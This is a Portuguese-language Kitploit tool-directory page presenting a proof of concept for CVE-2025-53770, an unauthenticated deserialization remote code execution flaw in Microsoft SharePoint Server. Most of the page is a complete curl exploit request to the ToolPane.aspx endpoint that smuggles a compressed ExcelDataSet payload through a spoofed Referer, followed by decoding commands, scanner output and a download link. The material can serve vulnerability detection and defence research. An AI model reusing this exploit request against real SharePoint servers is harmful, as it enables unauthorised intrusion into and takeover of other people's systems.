Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-53770 — Execução de Código Remota Não Autenticada via desserialização insegura no Microsoft SharePoint Server (CVE-2025-53770) | Kitploit
Ferramentas/GitHubGitHub/muhammadwaseem29/cve-2025-53770
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubmuhammadwaseem29/cve-2025-53770

CVE-2025-53770

Execução de Código Remota Não Autenticada via desserialização insegura no Microsoft SharePoint Server (CVE-2025-53770)

Ver Repositório
584há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

CVE-2025-53770 PoC de RCE por Desserialização no SharePoint

Crítico — Execução Remota de Código não autenticada via desserialização insegura no Microsoft SharePoint Server (CVE-2025-53770)

Descrição

A desserialização de dados não confiáveis no Microsoft SharePoint Server local (on-premises) permite que um atacante execute código remotamente e comprometa o sistema. A Microsoft está ciente da exploração ativa e está preparando uma atualização abrangente. Garanta que as mitigações da documentação da CVE estejam em vigor.

  • Impacto: Atacantes não autenticados podem alcançar execução remota de código, levando ao comprometimento total do sistema.
  • Gravidade: Crítica

Prova de Conceito

O PoC a seguir demonstra como um atacante pode explorar a vulnerabilidade para extrair e decodificar payloads maliciosos por meio do endpoint vulnerável.

O domínio alvo é intencionalmente substituído por target.com.

Comando

root@kitploit:~
curl -sk -X POST 'https://target.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://target.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Saída

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
imagem

Referências

  • Implementação do Payload de Teste
  • Análise de Segurança Code White
  • Orientação da Microsoft
  • Entrada NVD

Impacto:
Atacantes não autenticados podem explorar a desserialização insegura para obter execução remota de código no SharePoint Server, levando ao comprometimento total do sistema.

Baixar ferramenta